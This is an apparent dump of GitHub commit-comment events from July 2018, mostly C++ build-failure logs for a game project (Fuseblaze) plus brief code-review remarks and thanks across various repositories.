{"id":"7990085252","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29766855,"position":null,"line":null,"path":null,"commit_id":"70c5a564bf49f783588fcdac7a4ef980e85129f4","created_at":"2018-07-19T15:53:31Z","updated_at":"2018-07-19T15:53:31Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[  1%] Built target glew\n[ 10%] Built target box2d\n[ 38%] Built target sp2freetype\n[ 44%] Built target lua\n[ 75%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/home/daid/_tinyci/daid/SeriousProton2/src/collision/2d/circle.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:494: recipe for target 'CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o' failed\nCMakeFiles/Fuseblaze.dir/build.make:326: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/sectorLoader.cpp:7:21: fatal error: winsock.h: No such file or directory\n #include <winsock.h>\n                     ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:16:18: error: 'virtual void ShadowRenderPass::render(sp::RenderQueue&)' marked 'override', but does not override\n     virtual void render(sp::RenderQueue& queue) override\n                  ^~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In member function 'virtual void ShadowRenderPass::render(sp::RenderQueue&)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:20:19: error: 'class sp::RenderQueue' has no member named 'setCamera'\n             queue.setCamera(camera);\n                   ^~~~~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:31:14: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n             });\n              ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:44:18: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n                 });\n                  ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:59:14: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n             });\n              ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp: In function 'int main(int, char**)':\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:160:57: error: invalid new-expression of abstract class type 'ShadowRenderPass'\n         shadow_pass = new ShadowRenderPass(scene, camera);\n                                                         ^\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:6:7: note:   because the following virtual functions are pure within 'ShadowRenderPass':\n class ShadowRenderPass : public sp::RenderPass\n       ^~~~~~~~~~~~~~~~\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:4:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:16:18: note: \tvirtual void sp::RenderPass::renderSetup(float)\n     virtual void renderSetup(float aspect_ratio) = 0;\n                  ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:17:18: note: \tvirtual void sp::RenderPass::renderExecute()\n     virtual void renderExecute() = 0;\n                  ^~~~~~~~~~~~~\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-19T15:53:31Z"}
{"id":"7990087167","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29766858,"position":null,"line":null,"path":null,"commit_id":"70c5a564bf49f783588fcdac7a4ef980e85129f4","created_at":"2018-07-19T15:53:50Z","updated_at":"2018-07-19T15:53:50Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 10%] Built target box2d\n[ 10%] Built target glew\n[ 16%] Built target lua\n[ 44%] Built target sp2freetype\n[ 75%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/home/daid/_tinyci/daid/SeriousProton2/src/collision/2d/shape.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:494: recipe for target 'CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o' failed\nCMakeFiles/Fuseblaze.dir/build.make:326: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/sectorLoader.cpp:7:21: fatal error: winsock.h: No such file or directory\n #include <winsock.h>\n                     ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:16:18: error: 'virtual void ShadowRenderPass::render(sp::RenderQueue&)' marked 'override', but does not override\n     virtual void render(sp::RenderQueue& queue) override\n                  ^~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In member function 'virtual void ShadowRenderPass::render(sp::RenderQueue&)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:20:19: error: 'class sp::RenderQueue' has no member named 'setCamera'\n             queue.setCamera(camera);\n                   ^~~~~~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:31:14: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n             });\n              ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:44:18: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n                 });\n                  ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:59:14: error: no matching function for call to 'sp::RenderQueue::add(ShadowRenderPass::render(sp::RenderQueue&)::<lambda()>)'\n             });\n              ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note: candidate: void sp::RenderQueue::add(const Matrix4x4d&, const sp::RenderData&)\n     void add(const Matrix4x4d& transform, const RenderData& data);\n          ^~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:15:10: note:   candidate expects 2 arguments, 1 provided\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp: In function 'int main(int, char**)':\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:160:57: error: invalid new-expression of abstract class type 'ShadowRenderPass'\n         shadow_pass = new ShadowRenderPass(scene, camera);\n                                                         ^\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:6:7: note:   because the following virtual functions are pure within 'ShadowRenderPass':\n class ShadowRenderPass : public sp::RenderPass\n       ^~~~~~~~~~~~~~~~\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:4:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:16:18: note: \tvirtual void sp::RenderPass::renderSetup(float)\n     virtual void renderSetup(float aspect_ratio) = 0;\n                  ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:17:18: note: \tvirtual void sp::RenderPass::renderExecute()\n     virtual void renderExecute() = 0;\n                  ^~~~~~~~~~~~~\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-19T15:53:50Z"}
{"id":"7990087894","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29766860,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-19T15:53:57Z","updated_at":"2018-07-19T15:53:57Z","author_association":"COLLABORATOR","body":"In BSD style Makefile the syntax is:\r\n\r\n```\r\nPROG= regexec\r\nSRCS+= local_regexec.c\r\n.PATH: src/lib/libc/regex\r\nSRCS+=regexec.c regcomp.c\r\n\r\n.include <bsd.prog.mk>\r\n```\r\n\r\nPlease check e.g. `src/bin/ksh/Makefile`"}},"created_at":"2018-07-19T15:53:57Z"}
{"id":"7990089641","type":"CommitCommentEvent","actor":{"login":"CPColin"},"repo":{"name":"eclipse/ceylon.formatter"},"payload":{"comment":{"id":29766870,"position":17,"line":943,"path":"source/ceylon/formatter/FormattingVisitor.ceylon","commit_id":"494c42bad1a11e50736379094457e155888c628c","created_at":"2018-07-19T15:54:16Z","updated_at":"2018-07-19T15:54:16Z","author_association":"NONE","body":"Nothing like a good WTF commit to get the blood flowing! :)\r\n\r\nYou might as well push the fix, for simplicity."}},"created_at":"2018-07-19T15:54:16Z"}
{"id":"7990091668","type":"CommitCommentEvent","actor":{"login":"jacob314"},"repo":{"name":"flutter/flutter-intellij"},"payload":{"comment":{"id":29766875,"position":4,"line":304,"path":"src/io/flutter/logging/FlutterLogTree.java","commit_id":"6c968f95ac54511d9deffdb244733d9946065941","created_at":"2018-07-19T15:54:37Z","updated_at":"2018-07-19T15:54:37Z","author_association":"CONTRIBUTOR","body":"Are you sure this should be made volatile? Generally,  all interaction with Swing UI must be on the UI thread so using volatile is never required. I would suggest removing this volatile keyword to avoid confusion when other people view this code.  Generally it looks like autoScrollToEnd is being set from the UI thread."}},"created_at":"2018-07-19T15:54:37Z"}
{"id":"7990091718","type":"CommitCommentEvent","actor":{"login":"ionut-cristinel"},"repo":{"name":"ionut-cristinel/PentaStagiuVara2018Homework"},"payload":{"comment":{"id":29766876,"position":35,"line":35,"path":"Module03Week02/Homework01/Views/Messages/Edit.cshtml","commit_id":"39ceb3880ecd158cf3a6d28d71e8ce7dada01742","created_at":"2018-07-19T15:54:37Z","updated_at":"2018-07-19T15:54:37Z","author_association":"OWNER","body":"Foartea buna sugestia, bine de stiut pe viitor, stiam de atributul selected dar se pare ca la momentul respectiv am fost mai concentrat pe C# si ASP.\r\nMerci."}},"created_at":"2018-07-19T15:54:37Z"}
{"id":"7990092862","type":"CommitCommentEvent","actor":{"login":"cmnstmntmn"},"repo":{"name":"phoenixframework/phoenix"},"payload":{"comment":{"id":29766878,"position":null,"line":null,"path":null,"commit_id":"726ee2ee6f388414a65b2f9b88e5de7d1cb7e7bf","created_at":"2018-07-19T15:54:49Z","updated_at":"2018-07-19T15:54:49Z","author_association":"NONE","body":"hmm, this is still broken here: \r\nhttps://hexdocs.pm/phoenix/up_and_running.html#content\r\n\r\nnavigate to bottom of the page / click  **The next step**"}},"created_at":"2018-07-19T15:54:49Z"}
{"id":"7990100377","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29766892,"position":null,"line":null,"path":null,"commit_id":"70c5a564bf49f783588fcdac7a4ef980e85129f4","created_at":"2018-07-19T15:56:04Z","updated_at":"2018-07-19T15:56:04Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 10%] Built target box2d\n[ 10%] Built target glew\n[ 38%] Built target sp2freetype\n[ 44%] Built target lua\n[ 75%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/blood.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/dynamicSectorLoader.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editor.cpp.o\n[ 75%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/editorHandle.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/editor/prototype.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/effect.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/enemy.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/hulk.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/enemies/screamer.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/hudManager.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/mapGenerator.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/medkit.cpp.o\n[ 78%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/pickup.cpp.o\n[ 78%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/weapon.cpp.o\n[ 78%] Building CXX object CMakeFiles/Fuseblaze.dir/src/player.cpp.o\n[ 78%] Building CXX object CMakeFiles/Fuseblaze.dir/src/prefab.cpp.o\n[ 78%] Building CXX object CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:494: recipe for target 'CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp: In member function 'sp::Vector2d Editor::toWorld(sp::Vector2d)':\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp:159:1: warning: no return statement in function returning non-void [-Wreturn-type]\n }\n ^\n/home/daid/_tinyci/daid/Fuseblaze/src/sectorLoader.cpp:7:21: fatal error: winsock.h: No such file or directory\n #include <winsock.h>\n                     ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/sectorLoader.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-19T15:56:04Z"}
{"id":"7990104445","type":"CommitCommentEvent","actor":{"login":"overheadhunter"},"repo":{"name":"cryptomator/cryptomator"},"payload":{"comment":{"id":29766896,"position":5,"line":119,"path":"main/ui/src/main/java/org/cryptomator/ui/model/WebDavVolume.java","commit_id":"59d019f34a2d52765050502bfef1ca436e1faebe","created_at":"2018-07-19T15:56:41Z","updated_at":"2018-07-19T15:56:41Z","author_association":"MEMBER","body":"Don't use `this.` when invoking static methods. Use the class name instead, e.g. `WebDavVolume.isSupportedStatic()`"}},"created_at":"2018-07-19T15:56:41Z"}
{"id":"7990106538","type":"CommitCommentEvent","actor":{"login":"quangson91"},"repo":{"name":"flutter/flutter-intellij"},"payload":{"comment":{"id":29766899,"position":4,"line":304,"path":"src/io/flutter/logging/FlutterLogTree.java","commit_id":"6c968f95ac54511d9deffdb244733d9946065941","created_at":"2018-07-19T15:57:05Z","updated_at":"2018-07-19T15:57:05Z","author_association":"CONTRIBUTOR","body":"I will double check. I set to `volatile` because I thought that can be set anywhere.\r\nBut I will check it again."}},"created_at":"2018-07-19T15:57:05Z"}
{"id":"7990108728","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"syntax-tree/hast-util-raw"},"payload":{"comment":{"id":29766906,"position":8,"line":34,"path":"package.json","commit_id":"e390a5f92667877ebeac8d855d93ac02f736c1a2","created_at":"2018-07-19T15:57:27Z","updated_at":"2018-07-19T15:57:27Z","author_association":"MEMBER","body":"Thanks, fixed in e74eab7!"}},"created_at":"2018-07-19T15:57:27Z"}
{"id":"7990113173","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"eclipse/ceylon.formatter"},"payload":{"comment":{"id":29766916,"position":17,"line":943,"path":"source/ceylon/formatter/FormattingVisitor.ceylon","commit_id":"494c42bad1a11e50736379094457e155888c628c","created_at":"2018-07-19T15:58:13Z","updated_at":"2018-07-19T15:58:13Z","author_association":"CONTRIBUTOR","body":"Done, see 45574a6aae."}},"created_at":"2018-07-19T15:58:13Z"}
{"id":"7990113788","type":"CommitCommentEvent","actor":{"login":"suzrik"},"repo":{"name":"siberex/irkfap.com"},"payload":{"comment":{"id":29766917,"position":5,"line":16,"path":"src/about.php","commit_id":"290d6ae5588ce1ee3e07b085bc05219be497ed09","created_at":"2018-07-19T15:58:19Z","updated_at":"2018-07-19T15:58:19Z","author_association":"COLLABORATOR","body":"Так сеньер или джуниор?"}},"created_at":"2018-07-19T15:58:19Z"}
{"id":"7990119299","type":"CommitCommentEvent","actor":{"login":"YaroslavRenhevych"},"repo":{"name":"YaroslavRenhevych/HelloWorldHTML"},"payload":{"comment":{"id":29766930,"position":null,"line":null,"path":null,"commit_id":"cf81675963c9af6c7824d3b563798d95ad263421","created_at":"2018-07-19T15:59:17Z","updated_at":"2018-07-19T15:59:17Z","author_association":"OWNER","body":"eee"}},"created_at":"2018-07-19T15:59:17Z"}
{"id":"7990119320","type":"CommitCommentEvent","actor":{"login":"overheadhunter"},"repo":{"name":"cryptomator/cryptomator"},"payload":{"comment":{"id":29766931,"position":20,"line":49,"path":"main/ui/src/main/java/org/cryptomator/ui/model/DokanyVolume.java","commit_id":"59d019f34a2d52765050502bfef1ca436e1faebe","created_at":"2018-07-19T15:59:18Z","updated_at":"2018-07-19T15:59:18Z","author_association":"MEMBER","body":"replace `driveLetter == 65` by `driveLetter == 'A'` due to code readability"}},"created_at":"2018-07-19T15:59:18Z"}
{"id":"7990122569","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29766935,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T15:59:51Z","updated_at":"2018-07-19T15:59:51Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2941 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T15:59:51Z"}
{"id":"7990126073","type":"CommitCommentEvent","actor":{"login":"ionut-cristinel"},"repo":{"name":"ionut-cristinel/PentaStagiuVara2018Homework"},"payload":{"comment":{"id":29766952,"position":25,"line":25,"path":"Module03Week01/Homework01/Controllers/MessagesController.cs","commit_id":"e5e22c62056d433a4ba2260211b1d1526245aa66","created_at":"2018-07-19T16:00:26Z","updated_at":"2018-07-19T16:00:26Z","author_association":"OWNER","body":"Multumesc, o sa tin cont pe viitor."}},"created_at":"2018-07-19T16:00:26Z"}
{"id":"7990127496","type":"CommitCommentEvent","actor":{"login":"sinansahin"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29766954,"position":null,"line":null,"path":null,"commit_id":"8b73e5e637016f1ba6f0a788078280e7eab862bd","created_at":"2018-07-19T16:00:40Z","updated_at":"2018-07-19T16:00:40Z","author_association":"COLLABORATOR","body":"@isubas \r\n\r\nBurayı bi kontrol eder misin?"}},"created_at":"2018-07-19T16:00:40Z"}
{"id":"7990131423","type":"CommitCommentEvent","actor":{"login":"siberex"},"repo":{"name":"siberex/irkfap.com"},"payload":{"comment":{"id":29766964,"position":5,"line":16,"path":"src/about.php","commit_id":"290d6ae5588ce1ee3e07b085bc05219be497ed09","created_at":"2018-07-19T16:01:20Z","updated_at":"2018-07-19T16:01:20Z","author_association":"OWNER","body":"Выдающийся Джуниор, понизили в должности"}},"created_at":"2018-07-19T16:01:20Z"}
{"id":"7990131842","type":"CommitCommentEvent","actor":{"login":"sharedprophet"},"repo":{"name":"digitallyserviced/semanticolor"},"payload":{"comment":{"id":29766965,"position":null,"line":null,"path":null,"commit_id":"53debe176695740f2eb339ca7c6ad551fde8259b","created_at":"2018-07-19T16:01:24Z","updated_at":"2018-07-19T16:01:24Z","author_association":"COLLABORATOR","body":"Support mjml."}},"created_at":"2018-07-19T16:01:24Z"}
{"id":"7990136481","type":"CommitCommentEvent","actor":{"login":"Shubhnisha"},"repo":{"name":"Shubhnisha/Datasciencecoursera"},"payload":{"comment":{"id":29766972,"position":null,"line":null,"path":null,"commit_id":"79319534eced36449c447d824583080bbdc183d5","created_at":"2018-07-19T16:02:13Z","updated_at":"2018-07-19T16:02:13Z","author_association":"OWNER","body":"HelloWorld.md"}},"created_at":"2018-07-19T16:02:13Z"}
{"id":"7990139375","type":"CommitCommentEvent","actor":{"login":"IhorFedchenko"},"repo":{"name":"IhorFedchenko/oopExample"},"payload":{"comment":{"id":29766979,"position":null,"line":null,"path":null,"commit_id":"c854a88e0486a2594cc6cefdd0cb6ed50af3a0ba","created_at":"2018-07-19T16:02:44Z","updated_at":"2018-07-19T16:02:44Z","author_association":"OWNER","body":"3:37:34"}},"created_at":"2018-07-19T16:02:44Z"}
{"id":"7990145489","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29766989,"position":15,"line":59,"path":"src/jrd/Attachment.cpp","commit_id":"be02a9f67c0172b969f96643527c84dd007ddc8c","created_at":"2018-07-19T16:03:48Z","updated_at":"2018-07-19T16:03:48Z","author_association":"MEMBER","body":"Indentation become wrong here."}},"created_at":"2018-07-19T16:03:48Z"}
{"id":"7990149713","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29766996,"position":14,"line":59,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/AdminWorld.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T16:04:32Z","updated_at":"2018-07-19T16:04:32Z","author_association":"OWNER","body":"Doesn't return error, same functionality"}},"created_at":"2018-07-19T16:04:32Z"}
{"id":"7990151917","type":"CommitCommentEvent","actor":{"login":"MCamp859"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29767000,"position":100,"line":100,"path":"source/clear-linux/tutorials/kata.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-19T16:04:56Z","updated_at":"2018-07-19T16:04:56Z","author_association":"OWNER","body":"@mythi I put a placeholder here."}},"created_at":"2018-07-19T16:04:56Z"}
{"id":"7990153859","type":"CommitCommentEvent","actor":{"login":"MCamp859"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29767004,"position":4,"line":52,"path":"source/clear-linux/tutorials/kata_migration.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-19T16:05:16Z","updated_at":"2018-07-19T16:05:16Z","author_association":"OWNER","body":"@mythi, see placeholder here."}},"created_at":"2018-07-19T16:05:16Z"}
{"id":"7990153963","type":"CommitCommentEvent","actor":{"login":"DavyLandman"},"repo":{"name":"usethesource/rascal-core"},"payload":{"comment":{"id":29767006,"position":2,"line":2,"path":"src/org/rascalmpl/core/library/lang/rascalcore/check/GetGrammar.rsc","commit_id":"35a28079efa6c5a5980aec8ed6a31dc698ad1f02","created_at":"2018-07-19T16:05:17Z","updated_at":"2018-07-19T16:05:17Z","author_association":"MEMBER","body":"I'm seeing double :wink:"}},"created_at":"2018-07-19T16:05:17Z"}
{"id":"7990155662","type":"CommitCommentEvent","actor":{"login":"seandong"},"repo":{"name":"mycolorway/activestorage_qiniu"},"payload":{"comment":{"id":29767011,"position":null,"line":null,"path":null,"commit_id":"9bff266adfbbe8afc56408fd2f0fab61ef25f262","created_at":"2018-07-19T16:05:36Z","updated_at":"2018-07-19T16:05:36Z","author_association":"MEMBER","body":"Updated. thank you."}},"created_at":"2018-07-19T16:05:36Z"}
